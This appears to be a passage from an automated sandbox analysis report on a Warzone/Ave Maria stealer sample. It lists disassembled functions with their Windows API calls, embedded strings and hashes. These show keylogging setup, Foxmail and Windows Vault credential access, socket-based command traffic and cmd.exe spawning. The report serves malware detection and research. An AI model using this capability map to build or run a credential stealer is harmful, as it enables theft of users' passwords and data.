                                                • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                                • String ID: \System32\cmd.exe
                                                • API String ID: 2560724043-2003734499
                                                • Opcode ID: a57bf896a3336705eb9b682125765ae6f9619cb330a9343a21c2e3882dae45c2
                                                • Instruction ID: 58d9c2cc0fac3df26a084fe9f643917a57aa3547e5bb2355e88c07080238d8f7
                                                • Opcode Fuzzy Hash: a57bf896a3336705eb9b682125765ae6f9619cb330a9343a21c2e3882dae45c2
                                                • Instruction Fuzzy Hash: 701130F1A00208BBE711A7B5DC86FEF766CAB44748F100036F701B6191DA749E04866A
                                                Function 0040990A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409916
                                                • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 0040992D
                                                • EnterCriticalSection.KERNEL32(0054DB10,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409939
                                                • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409949
                                                • LeaveCriticalSection.KERNEL32(0054DB10,?,00000000), ref: 0040999C
                                                  • Part of subcall function 00401F4B: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401F60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                                • String ID: .@
                                                • API String ID: 2964645253-2319581949
                                                • Opcode ID: 8046fc8c73f33d8b847f44aa86fe7b112ca24563832baac2ee284265c6a58787
                                                • Instruction ID: ece506f6ce73bbe589a0b7a088f437cf03b5d3714308d2ac1236f01bd29d78b7
                                                • Opcode Fuzzy Hash: 8046fc8c73f33d8b847f44aa86fe7b112ca24563832baac2ee284265c6a58787
                                                • Instruction Fuzzy Hash: 51019275A00104ABCB10AB619C5DBDF3FB8E792328F01803AF50567291DB798485CBB4
                                                Function 004099A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(0054DB10,?,00401221), ref: 004099D3
                                                • LoadLibraryW.KERNEL32(User32.dll,?,00401221), ref: 004099FE
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                                • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                                • API String ID: 4274177235-2474467583
                                                • Opcode ID: 70ba2c87c43956a8113042fecd34b8cd119bb0cfa2f61229f0dfcf48f947fb65
                                                • Instruction ID: d3de00d1aaf43c769e47584a328517c6764db5a5fe2dfc5d57fcb1e04d2cd97e
                                                • Opcode Fuzzy Hash: 70ba2c87c43956a8113042fecd34b8cd119bb0cfa2f61229f0dfcf48f947fb65
                                                • Instruction Fuzzy Hash: C7014FB9B506208B8305AF66B8141C93AB5EB99B58713813FF40497261EB7809C5AFAC
                                                Function 00407CB7 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,004086D6,00000000), ref: 00407CD3
                                                • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError,?,004086D6,00000000), ref: 00407CE1
                                                • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error,?,004086D6,00000000), ref: 00407CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                • API String ID: 667068680-2897241497
                                                • Opcode ID: ca2f48d9d945e85a8ca547694f7e163dfc737f3cbe43738b7c5093b57363dbe7
                                                • Instruction ID: aaa8e0cf8f8ab446e772eb97fece59f95b58d6c8f0af5f7a7dbdea8d920d86da
                                                • Opcode Fuzzy Hash: ca2f48d9d945e85a8ca547694f7e163dfc737f3cbe43738b7c5093b57363dbe7
                                                • Instruction Fuzzy Hash: 0BF030786052019BDB145FB5AC0AAB73BB8BED5B45310443AF81DD33A0D77498459A29
                                                Function 004057FB Relevance: 9.1, APIs: 6, Instructions: 75networksynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,770113FB,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151
                                                  • Part of subcall function 0041026F: WaitForSingleObject.KERNEL32(?,000000FF,00405824,770113FB,?,?,00000000,00404EA0,?,?,?,?,?,00000000,770113FB), ref: 00410273
                                                • getaddrinfo.WS2_32(770113FB,00000000,00404EA0,00000000), ref: 00405848
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040585F
                                                • htons.WS2_32(00000000), ref: 00405885
                                                • freeaddrinfo.WS2_32(00000000), ref: 00405895
                                                • connect.WS2_32(?,?,00000010), ref: 004058A1
                                                • ReleaseMutex.KERNEL32(?), ref: 004058CB
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                                • String ID:
                                                • API String ID: 2516106447-0
                                                • Opcode ID: 9c1a482bcd5bf69540202eb33f3d72a39c7a596b10995cfaab2cecbcb9b1a230
                                                • Instruction ID: 092a2e84de4c1a6289be47cc7bce06a374af0b8a9768fb0cb1c663c0770c8cb0
                                                • Opcode Fuzzy Hash: 9c1a482bcd5bf69540202eb33f3d72a39c7a596b10995cfaab2cecbcb9b1a230
                                                • Instruction Fuzzy Hash: 77215C72A00208ABDF109F61D889BDABBB9FF84320F108066FD15EB291D7759A45CB64
                                                Function 0040CBA8 Relevance: 9.1, APIs: 6, Instructions: 73filememoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040CBDC
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040CBF2
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040CC0D
                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040CC25
                                                • CloseHandle.KERNEL32(00000000), ref: 0040CC48
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
                                                  • Part of subcall function 0040CC54: LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
                                                  • Part of subcall function 0040CC54: LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                                • String ID:
                                                • API String ID: 4225742195-0
                                                • Opcode ID: 9d4b79665f6409aa914b77d2342f484c62a30efc57680bae1199c67c8088053d
                                                • Instruction ID: 745445a8a1a410ce86548f79becf7b71122546dbf84d59e0bf673223a6bc5152
                                                • Opcode Fuzzy Hash: 9d4b79665f6409aa914b77d2342f484c62a30efc57680bae1199c67c8088053d
                                                • Instruction Fuzzy Hash: 9F11C371600114FBEB259BA9DCC4EAFBBB8EF45750B00827AF909E6294D7349D41CB98
                                                Function 0040562F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405666
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,770113FB,?,00405A4F,h\HA,00000000), ref: 004033C8
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
                                                  • Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 004056B6
                                                • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405726
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                                • String ID: `$warzone160
                                                • API String ID: 3973575906-811885577
                                                • Opcode ID: 710b13efe40a603839c9b2b6d797050bdf6ef0168bf0519c6c761d0257aa3e9a
                                                • Instruction ID: 13b9312c21fac82d743b2aac4943a07556a81bf37369194c12953ac8d4d921d3
                                                • Opcode Fuzzy Hash: 710b13efe40a603839c9b2b6d797050bdf6ef0168bf0519c6c761d0257aa3e9a
                                                • Instruction Fuzzy Hash: 35514B71901119AACB15EF62CC86CEFBB7CEF44354F10417AF416B71D1EA785A44CAA8
                                                Function 00410B2A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                • MessageBoxA.USER32 ref: 00410B70
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00410BD9: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410C14
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                • VirtualQuery, xrefs: 00410B37
                                                • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 00410BAE
                                                • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 00410B7E
                                                • Bla2, xrefs: 00410B67, 00410B6D, 00410B6E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                                • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                                • API String ID: 1196126833-2308542105
                                                • Opcode ID: 59639a4b70987e4e968c6b63bff16cb3f086a3038b09aaa77ad0ffa956b70a53
                                                • Instruction ID: 4ba3c5a06052b2c8142ea2b85e7c1df050322749d38e1d50acf48aea32407323
                                                • Opcode Fuzzy Hash: 59639a4b70987e4e968c6b63bff16cb3f086a3038b09aaa77ad0ffa956b70a53
                                                • Instruction Fuzzy Hash: 48111271904118BADB08EBA1DD56CEFBB7CDE44718B10016FB402B2181DB78AF84C668
                                                Function 00411936 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000), ref: 00411974
                                                • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411988
                                                • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411996
                                                • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 004119A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
                                                • String ID: \System32\cmd.exe
                                                • API String ID: 2244922440-2003734499
                                                • Opcode ID: b35bf8d72498e572ccce794c73ad00c33004e6f459524028fc2f66513e749da9
                                                • Instruction ID: a76fe1fb72b9dcd2ba7f7b2c9fe6201737636b2b93b56a950f172e3949bf7431
                                                • Opcode Fuzzy Hash: b35bf8d72498e572ccce794c73ad00c33004e6f459524028fc2f66513e749da9
                                                • Instruction Fuzzy Hash: 4A0124712803507BE22057659C0AFEB2BA88B89B41F104035F749BA1D0C9A8A880839C
                                                Function 0040CE83 Relevance: 8.8, APIs: 7, Instructions: 35COMMON
                                                Download Yara Rule
                                                APIs
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CE9A
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEA5
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEB0
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEBB
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEC6
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CED1
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,0040CAF5), ref: 0040CED4
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocal
                                                • String ID:
                                                • API String ID: 2826327444-0
                                                • Opcode ID: 47c525463b210852906738e17e9094fe2dc180302977f63d8cd6e62f7ece355f
                                                • Instruction ID: e5bdd054c72edd405893c5fb69fba9bb4791af85785efefa7983030c1237c843
                                                • Opcode Fuzzy Hash: 47c525463b210852906738e17e9094fe2dc180302977f63d8cd6e62f7ece355f
                                                • Instruction Fuzzy Hash: 1BF09C31050B14DBD7366B25DC48767B6F1BF80305F15093AD58161AB08779A896DB94
                                                Function 00409D9A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00409DB5
                                                • RegQueryValueExA.ADVAPI32 ref: 00409DDC
                                                • PathRemoveFileSpecA.SHLWAPI(004197B0), ref: 00409DE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileOpenPathQueryRemoveSpecValue
                                                • String ID: Executable$software\Aerofox\FoxmailPreview
                                                • API String ID: 3687894118-2371247776
                                                • Opcode ID: 28ba990561e6b3eb0aeea4ee47ce201ab51b9c295677a5cf9b519593c38b6ce1
                                                • Instruction ID: 0bac63cb233140f308035db5f7d86828bf01501f6a5ebf857ff9987f94d08bec
                                                • Opcode Fuzzy Hash: 28ba990561e6b3eb0aeea4ee47ce201ab51b9c295677a5cf9b519593c38b6ce1
                                                • Instruction Fuzzy Hash: 6EF08274284204FFEB108B51DD8AFDA7BBCDB85B44F104066F901F21C1D3B49941A518
                                                Function 00410C79 Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410C97
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00410CAC
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00410CC4
                                                • CloseHandle.KERNEL32(00000000), ref: 00410CCF
                                                • CloseHandle.KERNEL32(00000000), ref: 00410CE0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 1789362936-0
                                                • Opcode ID: dbb6d2a3e1f78c4e63f1433d229d8ec0479cf8ed85dc0024f1e2f21a347d4ae9
                                                • Instruction ID: 2e00dfdaa672dd9684fc02a2f22ff91a15fe0b01dd777914ba71400be5e2cff0
                                                • Opcode Fuzzy Hash: dbb6d2a3e1f78c4e63f1433d229d8ec0479cf8ed85dc0024f1e2f21a347d4ae9
                                                • Instruction Fuzzy Hash: 0B01D631200214BBD7245BF5EC4CBFF7ABCAB84765F104166F50592290E7B88CC19F99
                                                Function 0040B9A9 Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040B132), ref: 0040B9BA
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9CA
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9D8
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9E6
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9F4
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction ID: de1b090c5ecee71095dd0539afea7425d556fea4fcc2e68f80fdcb856166325a
                                                • Opcode Fuzzy Hash: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction Fuzzy Hash: BCF0AEB1B00B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                                Function 0040B627 Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B638
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B648
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B656
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B664
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B672
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction ID: de1b090c5ecee71095dd0539afea7425d556fea4fcc2e68f80fdcb856166325a
                                                • Opcode Fuzzy Hash: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction Fuzzy Hash: BCF0AEB1B00B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                                Function 0040B203 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B559: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040B561
                                                • FreeLibrary.KERNEL32(?), ref: 0040B506
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403248: lstrcmpW.KERNEL32(?,?), ref: 00403252
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                                • String ID: 4$8$Internet Explorer
                                                • API String ID: 708496175-747916358
                                                • Opcode ID: f1e9ef1a3c3d77be1e0826d64f48fac323e22ef8b737ab1ad594b7bd1a133e9d
                                                • Instruction ID: b6cee262d57798efbd2936ca721335ce7e6008c0fa62be54d2cf6ef3d4be9e9b
                                                • Opcode Fuzzy Hash: f1e9ef1a3c3d77be1e0826d64f48fac323e22ef8b737ab1ad594b7bd1a133e9d
                                                • Instruction Fuzzy Hash: D4A12371D00219ABDF15EFA6CC859DEBB79FF44708F10402AF405B7291EB38AA45CB98
                                                Function 0040F33C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000017,00000001,00000006), ref: 0040F355
                                                • connect.WS2_32(00000000,?,0000001C), ref: 0040F37E
                                                • InetNtopW.WS2_32(00000017,?,?,00000802), ref: 0040F3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InetNtopconnectsocket
                                                • String ID: <5Ik
                                                • API String ID: 2247632992-1120072674
                                                • Opcode ID: d29b1ecdb4e48be8bf2ac1a270374fef9ed7a6ee3149c8623e764551c4d5f8e9
                                                • Instruction ID: 0180e237ebb21dbc614bd4bebe7721a6296938b2e8f70b845b2fda00e0167cc6
                                                • Opcode Fuzzy Hash: d29b1ecdb4e48be8bf2ac1a270374fef9ed7a6ee3149c8623e764551c4d5f8e9
                                                • Instruction Fuzzy Hash: E401F772E00218BAE72096A19C4AFEF377CEF08720F000532F614E71C1E6B58D4487E4
                                                Function 00413251 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathW.KERNEL32(00000400,?), ref: 0041327D
                                                • lstrcatW.KERNEL32(?,send.db), ref: 0041328F
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                                • String ID: 5$send.db
                                                • API String ID: 891666058-2022884741
                                                • Opcode ID: d8e56f645b98f6c255315b6d1be1f473f104b00fffb9f83420bb7978253f092e
                                                • Instruction ID: d648c445d5d92e18bce2bb64044d3db85d8843b1a173332005f5648c28ac963a
                                                • Opcode Fuzzy Hash: d8e56f645b98f6c255315b6d1be1f473f104b00fffb9f83420bb7978253f092e
                                                • Instruction Fuzzy Hash: 5A017C71940118ABCB10EB65DC46BEE7BBCAF50309F00807AA505B2181EB789B46CBD8
                                                Function 004136D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00413710
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00413722
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FolderFreePathVirtuallstrcat
                                                • String ID: ;$\Microsoft Vision\
                                                • API String ID: 1529938272-253167065
                                                • Opcode ID: 4da3fe99405f49955dbd7bbfbf2ecc4ebfd2d08027262b7171816c6352c623e7
                                                • Instruction ID: 53f0f5d706791bc013d25d8bebd25819b408b45714e2bf30d534f986f7503769
                                                • Opcode Fuzzy Hash: 4da3fe99405f49955dbd7bbfbf2ecc4ebfd2d08027262b7171816c6352c623e7
                                                • Instruction Fuzzy Hash: E0115EB1C00119BACB10EFA1DD49DDFBFB8EF55344F10416AB505B2181DB38AB85CB94
                                                Function 0040F3BD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0040F3D9
                                                • connect.WS2_32(00000000,?,00000010), ref: 0040F3F6
                                                • InetNtopW.WS2_32(00000002,0040F029,?,00000802), ref: 0040F425
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InetNtopconnectsocket
                                                • String ID: <5Ik
                                                • API String ID: 2247632992-1120072674
